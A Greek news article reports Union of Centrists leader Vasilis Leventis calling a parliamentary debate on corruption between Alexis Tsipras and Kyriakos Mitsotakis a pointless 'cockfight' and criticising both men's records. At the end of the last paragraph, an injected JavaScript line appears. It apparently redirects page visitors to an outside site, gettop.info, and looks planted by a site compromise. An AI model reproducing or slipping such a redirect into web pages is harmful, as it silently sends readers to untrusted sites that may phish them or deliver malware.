Λεβέντης κατά Τσίπρα και Μητσοτάκη: Δεν ήταν εικόνα Βουλής αυτή η κοκορομαχία

0
8

 

  Εικόνα μιας κοκορομαχίας χωρίς ουσία και αποτέλεσμα χαρακτήρισε στην δευτερολογία του, την προ ημερησίας διατάξεως συζήτηση για την διαπλοκή και τη διαφθορά, ο πρόεδρος της Ένωσης Κεντρώων Βασίλης Λεβέντης.
Μάλιστα κατηγόρησε τον πρωθυπουργό και τον πρόεδρο της ΝΔ ότι καλλιεργούν κλίμα οξύτητας, φανατισμού και ηλεκτρισμένης ατμόσφαιρας.

«Δεν ήταν εικόνα Βουλής αυτή η κοκορομαχία. Ο κόσμος δεν άκουσε να αναφέρονται στα προβλήματα του αλλά άκουσε ένα «αλληλοανάθεμα» του ενός εναντίον του άλλου«, ανέφερε.

Απευθυνόμενος στον πρωθυπουργό, ο κ. Λεβέντης πρότεινε, «αντί να κόβει το ΕΚΑΣ και να βάζει ΕΝΦΙΑ» όπως είπε, να υιοθετήσει την πρόταση του και να κόψει τις συντάξεις των χιλιάδων πλουσίων.

«Πρέπει να ζητήσετε συγνώμη από την κοινωνία για αυτά που υποσχεθήκατε και δεν τηρήσατε ότι υπάρχει τρίτος δρόμος. Δεν λέει ο κόσμος ότι καταστρέψατε τη χώρα αλλά ότι του δημιουργήσατε όνειρα τα οποία γκρεμίσατε», τόνισε ο κ. Λεβέντης.

Ο κ. Λεβέντης επιτέθηκε και στον Κυριάκο Μητσοτάκη, κατηγορώντας τον ότι δεν παρουσίασε κανένα συγκεκριμένο πρόγραμμα και υποστήριξε ότι την εικόνα του την γκρεμίζει η πολιτική που εφάρμοσε τα προηγούμενα χρόνια το κόμμα του και τον επέκρινε γιατί εμφανίστηκε να αυτο-επαινείται για τα πτυχία του.

«Στην πράξη αποδεικνύεται η ικανότητα του πολιτικού όσα πτυχία και να έχει. Κοινή λογική θέλει η πολιτική», σημείωσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here